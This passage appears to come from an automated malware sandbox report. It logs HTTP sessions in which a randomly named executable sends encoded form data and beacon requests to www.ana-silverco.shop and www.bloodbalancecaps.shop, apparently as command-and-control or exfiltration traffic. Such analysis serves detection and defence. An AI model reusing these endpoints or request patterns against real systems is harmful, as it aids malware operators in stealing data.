                                                                                Dec 3, 2024 14:24:16.928003073 CET908INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2Be1uRK20CLkmmMKiytTNa0XbxDuiJ1hewl2q0kmc9ZEfYgSVMOgrdDOMAn5uZP2pEF1StGsa%2FEao2bRiIUbEKRRTj1jWQsFIDQvwsWe%2FDv%2B%2FIRsqZIyys%2Fq1Ip2PsA7%2B65DPq1pspQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3e0446b27c445-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1493&rtt_var=746&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=792&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 190


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.550021172.67.156.195801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:18.484328985 CET812OUTPOST /ez1t/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.ana-silverco.shop
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.ana-silverco.shop/ez1t/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 33 64 73 34 76 4c 2b 52 33 2f 36 5a 5a 7a 68 38 67 57 78 2f 4b 34 71 4e 2f 70 39 4c 39 42 36 48 43 37 53 35 67 4b 74 56 35 6b 56 58 66 32 38 4c 2f 71 47 4f 55 37 50 41 48 53 32 39 47 4d 78 36 58 79 67 64 43 4b 4e 4d 35 61 30 34 35 4f 46 7a 50 76 36 4f 47 69 78 6a 62 66 66 51 59 53 41 70 7a 48 6a 67 4e 51 59 34 57 70 4e 4c 52 74 55 5a 64 2f 6a 2b 41 59 70 30 54 73 39 69 36 6b 44 52 69 4c 6f 64 4d 71 66 5a 36 4c 35 70 56 36 4a 2f 43 70 5a 45 34 54 63 53 6c 79 51 39 32 78 47 73 53 4f 4c 6a 6d 66 65 76 39 46 44 53 44 5a 37 59 61 47 4c 68 79 41 73 51 74 36 63 4c 30 58 2f 6e 33 73 4b 66 6f 44 69 47 4b 38 64 47 57 75 46 7a 4d 31 42 75 4c 77 6d 7a 5a 55 56 66
                                                                                Data Ascii: fh=3ds4vL+R3/6ZZzh8gWx/K4qN/p9L9B6HC7S5gKtV5kVXf28L/qGOU7PAHS29GMx6XygdCKNM5a045OFzPv6OGixjbffQYSApzHjgNQY4WpNLRtUZd/j+AYp0Ts9i6kDRiLodMqfZ6L5pV6J/CpZE4TcSlyQ92xGsSOLjmfev9FDSDZ7YaGLhyAsQt6cL0X/n3sKfoDiGK8dGWuFzM1BuLwmzZUVf
                                                                                Dec 3, 2024 14:24:19.663686037 CET902INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YmBwVoSQC171dnm6cY8gPxeQFzpNtkhvQJL%2FKbLB4CHkLi7Vtg0ohNOtOy79yj2PUh8J1fFw9VgH8RqM7QUnWz8Fu%2BGf6shnfqTEksWJan%2FzV%2BcgJsEi1duR6Aym76MhmKyDvXVxRlk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3e05578385e6a-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1688&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=812&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 190


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.550022172.67.156.195801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:21.154304981 CET1829OUTPOST /ez1t/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.ana-silverco.shop
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.ana-silverco.shop/ez1t/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 33 64 73 34 76 4c 2b 52 33 2f 36 5a 5a 7a 68 38 67 57 78 2f 4b 34 71 4e 2f 70 39 4c 39 42 36 48 43 37 53 35 67 4b 74 56 35 6b 64 58 66 46 45 4c 2b 4c 47 4f 56 37 50 41 4a 79 32 2b 47 4d 78 6a 58 79 4a 55 43 4b 51 35 35 5a 41 34 2f 63 4e 7a 4a 65 36 4f 4d 69 78 6a 45 50 66 56 58 79 41 47 7a 42 44 73 4e 51 6f 34 57 70 4e 4c 52 76 38 5a 55 4c 33 2b 43 59 70 33 45 63 39 55 78 45 44 35 69 4c 78 71 4d 71 61 73 6d 72 5a 70 56 61 5a 2f 41 61 68 45 77 54 63 51 31 69 51 6c 32 32 50 73 53 50 69 53 6d 63 44 41 39 43 50 53 41 38 57 79 45 53 37 46 68 44 78 6f 69 35 41 34 76 69 47 4c 79 4c 6d 54 71 78 48 38 4f 4e 42 6f 63 6f 6f 30 59 6e 38 33 63 52 76 69 4a 42 30 67 74 2b 2b 2b 6f 6b 56 75 47 6d 50 50 57 7a 46 68 51 6b 6d 39 79 6e 6c 63 2f 4c 34 47 72 56 7a 35 6b 32 53 39 31 56 50 32 4a 4e 78 58 65 30 45 66 4f 4e 7a 4a 5a 6a 61 6d 32 6c 4a 32 70 70 43 45 4a 78 56 52 78 65 50 7a 56 50 49 45 74 50 73 41 6b 71 75 77 4d 66 53 66 38 52 6c 74 71 2b 44 36 79 7a 55 65 51 4f 79 51 2b 61 54 39 74 4f 35 58 59 36 42 [TRUNCATED]
                                                                                Data Ascii: fh=3ds4vL+R3/6ZZzh8gWx/K4qN/p9L9B6HC7S5gKtV5kdXfFEL+LGOV7PAJy2+GMxjXyJUCKQ55ZA4/cNzJe6OMixjEPfVXyAGzBDsNQo4WpNLRv8ZUL3+CYp3Ec9UxED5iLxqMqasmrZpVaZ/AahEwTcQ1iQl22PsSPiSmcDA9CPSA8WyES7FhDxoi5A4viGLyLmTqxH8ONBocoo0Yn83cRviJB0gt+++okVuGmPPWzFhQkm9ynlc/L4GrVz5k2S91VP2JNxXe0EfONzJZjam2lJ2ppCEJxVRxePzVPIEtPsAkquwMfSf8Rltq+D6yzUeQOyQ+aT9tO5XY6BucOqkfBJFuM12Yj4xJb8+XQITJ95I+ZuT5EwlYRGHiPVVlxPhLvhyZ/SaSGUXZHpVoTw6YJcgyyaeMwfWF8/7XMsahg2isj2XOBEDkP4m1kOS8H6k0NfM8JBlpR4r61fCc5cPVDt/gtjCMQbpq629DdpqN3COHEdtqBD6bDVZ9gn3D2xd+Vk2LhxModUiNNlI7nYpitlIP4GtDzeVKDasyFQBSDNBIBns6NxJ/i2gpU/uMWoeogZNio23TlJbONlJerVnbivZXl83IEDpEO8RscUpkwBoYcHoVBe4Kyt14KgWMUKky+YOyGR47pDNJpVNW7yFKsUgGNe3bu05LZTX3C+iJV+Rcct93ujvIu/UstLmv341ikjaYU8DQVV9S0zVkbYZygbA8KOuiXULWAoy6LyqH6QE5ypJfAz++zF/Sl4MsbeWCbafLT/woz7Ne+tZTLrJwcq5EPy88mMnybkzI4cWgGwuuZt5blvI7n166TW3hmQhudO5syBPQS4D+3OVc6ekSOs8NEVk5/KftvDWk+RepKGbEguAsgT7Y+5ZUwUiHsLdfAJZdXSRZl5XRsT/fr2jLMyS9iK6S9qzfM+aJefJVWPn5HOLB/qK6zE3RdQI6gryvtxL91B5pKo0+PjsXI/ILUEjH9utJVcYYLRSaNCSaD11xUnUP [TRUNCATED]
                                                                                Dec 3, 2024 14:24:22.313878059 CET900INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L1LLDWAuj1tGb4tlsIjo1zim4JJi11Ajfi0xIg62lVg4ZxyrI%2BwboB2Oi1PLdiv13A7Wjspr2TKkEd6qrvF%2BauxzDq9SEEto%2BXybNRxqm2Qz41AVB5x6%2B0qOeTBPAIiDTRO%2BUlsKQVk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3e065ea677c94-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1953&rtt_var=976&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1829&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                Data Ascii: 19
                                                                                Dec 3, 2024 14:24:22.314310074 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.550023172.67.156.195801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:23.821989059 CET529OUTGET /ez1t/?fh=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS6fcUEAY0yLCPgkUVbpQbsIDX53LfadnD8pal0m+9g==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.ana-silverco.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:24:25.015377045 CET842INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:24 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=siPmq2UDGReQJdfjNvaTJJC5uVCwIPzIA0ubei6FN3TGEhLOCiAdW4ZHaX3RIcOt7I8DiYuuju6FaYxiklNIhGpuMFy56qBI0ZTXk5vM37h8m0aADqezIYhBorYL45jh5mbMNm%2ByDMk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3e076fa104239-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2310&min_rtt=2310&rtt_var=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=529&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.550024108.179.253.197801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:31.012573957 CET804OUTPOST /qimy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bloodbalancecaps.shop
                                                                                Origin: http://www.bloodbalancecaps.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 6b 55 63 78 50 36 38 61 35 31 54 6e 4d 74 54 67 52 52 34 31 4b 49 4c 42 62 64 38 57 55 49 4c 4f 74 6a 4e 2b 4d 55 78 39 70 52 57 58 4e 37 4e 31 69 68 62 4b 50 34 59 6c 77 31 62 2b 35 43 44 34 79 64 49 46 62 4b 49 70 50 33 49 61 46 68 63 72 69 54 4f 4d 69 63 5a 4e 68 39 77 6d 65 36 67 65 59 4c 78 76 75 5a 42 6e 71 6b 4a 77 57 73 79 58 76 48 41 6b 44 6c 72 50 39 77 4a 62 54 36 4c 6c 31 39 4f 2f 71 70 4a 52 53 43 6d 6a 38 37 31 34 70 67 34 71 4c 64 72 6c 47 54 2f 51 35 66 7a 71 42 70 4b 51 44 70 77 6d 54 54 73 74 34 55 36 4e 79 7a 38 65 51 70 2b 68 36 55 58 58 6e 54 46 49 36 34 6e 46 34 32 41 3d
                                                                                Data Ascii: fh=kUcxP68a51TnMtTgRR41KILBbd8WUILOtjN+MUx9pRWXN7N1ihbKP4Ylw1b+5CD4ydIFbKIpP3IaFhcriTOMicZNh9wme6geYLxvuZBnqkJwWsyXvHAkDlrP9wJbT6Ll19O/qpJRSCmj8714pg4qLdrlGT/Q5fzqBpKQDpwmTTst4U6Nyz8eQp+h6UXXnTFI64nF42A=
                                                                                Dec 3, 2024 14:24:32.351155043 CET1236INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:31 GMT
                                                                                Server: Apache
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                X-Endurance-Cache-Level: 2
                                                                                X-nginx-cache: WordPress
                                                                                Content-Length: 15183
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 [TRUNCATED]
                                                                                Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ 1s#N"h&\r&d&g\@Ys9=K\_0yE[%>7f`Um*Vf\R.4<IoT<t+tlcKdR,b7FpyG4y$sirB(`(s!M*/'6% v,Jv1^BjLUFjmn1fvDfUseN#l1=qY,L}?\&L0/5YGnik[:^gKh7b}'i2<,,O]:h?Pl_KwCQDSZq`~?=\vzYsi4q!C&ob4Qm*N&V;;Y"?XM3:S&!nA(Xnq}<7mkn7G6w&#n^SIj[Ot5p,I&rg@w"Ll
                                                                                Dec 3, 2024 14:24:32.351174116 CET124INData Raw: b5 f5 a4 f9 09 9c 64 c9 a9 fd 5a 6c 5a 63 0d b6 d0 92 d8 0e a0 09 e6 cd f5 5e 51 be d6 62 79 09 93 c9 44 ff 6c 7f 7d 68 6d 04 2e 56 02 9b 19 77 f2 63 76 88 8e 6a c4 82 25 0d 7f 59 e8 60 1a bf 14 d1 d5 20 c4 67 1c 0f 7e 29 62 f0 e2 5f 8a be e7 45
                                                                                Data Ascii: dZlZc^QbyDl}hm.Vwcvj%Y` g~)b_E`Uq0-Ikml<h_U [/xl`
                                                                                Dec 3, 2024 14:24:32.351193905 CET1236INData Raw: e1 33 bc b8 dc 3a f7 b7 ce a3 ad 33 d4 e7 5f ee 4d 32 5c b7 df 4a de 8b f4 1f 45 46 8f 22 f0 34 0e b6 6e 8d cb 15 40 a6 3e f0 d5 0e b6 26 8d 5c 5a ff 62 ad 7e d0 0b 1a 35 57 c1 f2 aa f5 b0 44 e8 6d b6 1e af b6 3e 65 9a e8 49 a3 90 11 c4 5c 42 d4
                                                                                Data Ascii: 3:3_M2\JEF"4n@>&\Zb~5WDm>eI\Bx;TLY; T/pi,amcj4jsykaf[HlTNnl)i/Qq!,NsjIu\(@Uy:1OG|9/}ehMh-6Y
                                                                                Dec 3, 2024 14:24:32.351219893 CET224INData Raw: 96 86 4a 1a ab 19 b6 c1 35 e6 0a 85 74 24 35 08 64 3b 85 27 58 e6 2c 41 4b 70 63 0f 31 95 6c ca 93 72 6e d2 79 5c b5 28 6d 47 71 77 99 f1 a7 4c 37 e9 56 c1 8a 60 99 d3 e6 12 89 31 d1 1a 07 2c bc 4b 4a df d1 dd fd 46 dc e4 58 e2 c7 02 ee c7 ee 41
                                                                                Data Ascii: J5t$5d;'X,AKpc1lrny\(mGqwL7V`1,KJFXA#!,93EX=X[wyxB-'Amr^FL`wER<6]LQQ!,7;s&E Azw2.;)E;'DM[X
                                                                                Dec 3, 2024 14:24:32.351229906 CET1236INData Raw: de dd 75 4e da eb a4 cc d0 cd bc ed b4 ff 28 32 78 14 19 3e 8a 8c 1e 45 2e f6 22 8b 9c 45 8e 80 df eb f4 47 90 91 7e 67 70 89 bf 0f 4b 0a 16 ee 97 de a3 02 62 fb 73 39 c1 97 93 19 aa ee 58 67 2a 82 5f fd 19 6e 01 9a ab 3b 9c df f2 90 09 2a f4 af
                                                                                Data Ascii: uN(2x>E."EG~gpKbs9Xg*_n;*cy@Z8+zRBW"DK^#x%Bp^FheApv?nhL(JZ'*2M}4dXOPDBF>2tSk0`)PH3IXh$<
                                                                                Dec 3, 2024 14:24:32.351243019 CET1236INData Raw: 38 63 3a e1 d2 1d 6a bd 93 b3 28 e2 32 29 bb d6 5e 94 0d 77 6e 1e 81 3c f8 b3 14 34 34 0f 0c d6 5a c4 4a 5a 1a b3 8c 8b b9 cf 25 e6 72 24 ec 62 86 7f 84 bd 88 9d 8b bd d0 0c 4a 0a ab 98 00 6b 51 08 93 b3 10 f9 6d c2 5c 02 4d 77 53 2d dc 5b 5a ba
                                                                                Data Ascii: 8c:j(2)^wn<44ZJZ%r$bJkQm\MwS-[Z5V:[]nrVi-7{bzpYn6o7$qxMTa/?VD<AUX*Qz>ZlNp<!H4>+ 1h3>:8btX(fk\MKx49p
                                                                                Dec 3, 2024 14:24:32.351255894 CET1236INData Raw: fe 67 00 f0 08 c1 2d f0 64 80 41 cf fd 1d 63 51 55 9e d4 6f 27 b5 06 99 4f 79 84 99 00 92 86 73 86 b6 53 cb 58 f9 16 88 02 1c 4e c4 4b ed d7 54 b7 58 fb 82 4b 60 7a 9d d5 44 63 46 90 b4 d1 d2 91 77 35 c4 df 8b eb 01 0c 5a db 5d f3 42 e7 02 cd ad
                                                                                Data Ascii: g-dAcQUo'OysSXNKTXK`zDcFw5Z]B~0> 2>o^N}trKY"lSQWO_,Sbgx2^EmcF;,z1@m0GreP0FKPI!0;VgGXO~*w.
                                                                                Dec 3, 2024 14:24:32.351561069 CET1236INData Raw: fb dc 05 9b bd d1 a8 7d d5 c3 e0 b0 45 7a 9e f7 79 eb 60 eb 7d 8f 6f 7a 6f 1b f9 70 ff 66 af df c7 3e 5e bb 77 e5 ad db 7b ed be 77 d5 ee 0d bc 27 bb 17 19 97 aa 30 cb 96 2c 0b 40 3b 06 7b 71 a5 99 4c 9e 90 a1 3f ea 23 87 51 db db c8 e0 82 a3 76
                                                                                Data Ascii: }Ezy`}ozopf>^w{w'0,@;{qL?#Qv[EjQCCTVKe{xO5We52lGOBh!oy[[J0\pXbs5Z}|(T:GR][4m-P
                                                                                Dec 3, 2024 14:24:32.351573944 CET1236INData Raw: 00 ca d7 bd 4d 1f 07 08 41 5a d0 88 f0 a1 30 96 c7 73 1a 2a 0c 48 e7 90 f2 66 0f 8c 15 56 ed 33 ac 62 0f 4b c9 f7 1a 39 ad be dc 48 54 49 6a 2c d3 58 d8 eb f4 b5 23 b7 73 07 32 aa 24 3b 8c e7 c7 5c 1b 4b c3 94 8b e8 00 f4 13 00 82 1d aa df b4 d7
                                                                                Data Ascii: MAZ0s*HfV3bK9HTIj,X#s2$;\KJ9e)zUf4_v^,DqN!p^oX}k^YH]`!+w^qRv%1\t\#72lc{CJV'Yer~]4
                                                                                Dec 3, 2024 14:24:32.351587057 CET1236INData Raw: 0e 53 3e e5 11 d5 10 7d 52 87 35 4a 4d 07 51 64 5c aa 62 d5 4a 69 26 93 4f 53 ab 16 f1 e9 ce 2c 0b 40 bf 66 e3 12 b0 ae 2f 4f 52 8b 66 01 90 4b fb 7c 4a cf 3d b0 83 3b 7c a5 7e fb 60 87 5c 59 35 12 c5 a7 ad 72 17 ea e0 6c af d3 6c 0f eb 60 b7 bc
                                                                                Data Ascii: S>}R5JMQd\bJi&OS,@f/ORfK|J=;|~`\Y5rll`xVPMOwpL5V3c?}ro`NAM ?M0)9i@_x@ @^u37)M4|,^^V L|)j^AE*V-f
                                                                                Dec 3, 2024 14:24:32.471890926 CET1236INData Raw: 53 9e 94 6a 6e b3 3c 05 ed 43 61 2c 8f e7 25 20 2e cb 8f 05 dc 3b c6 27 f1 1d 2c 6a cb 4b 1d 4e 02 18 3e 02 70 e4 70 e3 60 67 00 f2 24 8c 8b 57 5f ef c5 b1 f5 1e d1 73 80 7a be b0 e5 e5 a2 54 2e e2 1a 42 b7 46 3f 54 a2 c8 e4 98 09 9e e0 4e 2d 64
                                                                                Data Ascii: Sjn<Ca,% .;',jKN>pp`g$W_szT.BF?TN-d)mk=z[Oswz}jaz(=o!3Kv>.>x^fhv,^iJ*S[zt=`00"`p}A?KACmsJZt"8-9jflkpv5v


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.550025108.179.253.197801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:33.704130888 CET824OUTPOST /qimy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bloodbalancecaps.shop
                                                                                Origin: http://www.bloodbalancecaps.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 6b 55 63 78 50 36 38 61 35 31 54 6e 4d 4e 6a 67 4b 79 67 31 4d 6f 4c 43 48 4e 38 57 4e 59 4c 4b 74 6a 42 2b 4d 57 63 6c 6f 6a 79 58 4d 66 64 31 6a 67 62 4b 63 49 59 6c 6c 46 62 6e 6b 53 43 36 79 64 45 37 62 50 49 70 50 33 63 61 46 67 73 72 2b 77 6e 2b 6a 4d 5a 50 74 64 78 41 42 71 67 65 59 4c 78 76 75 5a 46 4a 71 67 6c 77 57 63 43 58 39 57 41 6e 64 56 72 4d 36 77 4a 62 58 36 4c 70 31 39 4f 4e 71 6f 56 72 53 48 69 6a 38 35 39 34 70 78 34 31 41 64 72 6a 4a 7a 2b 45 30 38 76 75 41 34 4c 46 5a 4c 6f 6b 46 77 63 6e 30 43 4c 6e 6f 52 30 32 44 4a 53 5a 71 48 66 67 32 6a 6b 68 67 62 33 31 6d 68 58 7a 71 39 31 55 52 6c 6c 6c 33 58 61 79 6a 66 42 69 62 58 38 79
                                                                                Data Ascii: fh=kUcxP68a51TnMNjgKyg1MoLCHN8WNYLKtjB+MWclojyXMfd1jgbKcIYllFbnkSC6ydE7bPIpP3caFgsr+wn+jMZPtdxABqgeYLxvuZFJqglwWcCX9WAndVrM6wJbX6Lp19ONqoVrSHij8594px41AdrjJz+E08vuA4LFZLokFwcn0CLnoR02DJSZqHfg2jkhgb31mhXzq91URlll3XayjfBibX8y
                                                                                Dec 3, 2024 14:24:35.024609089 CET1236INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:34 GMT
                                                                                Server: Apache
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                X-Endurance-Cache-Level: 2
                                                                                X-nginx-cache: WordPress
                                                                                Content-Length: 15183
                                                                                Content-Type: text/html; charset=UTF-8
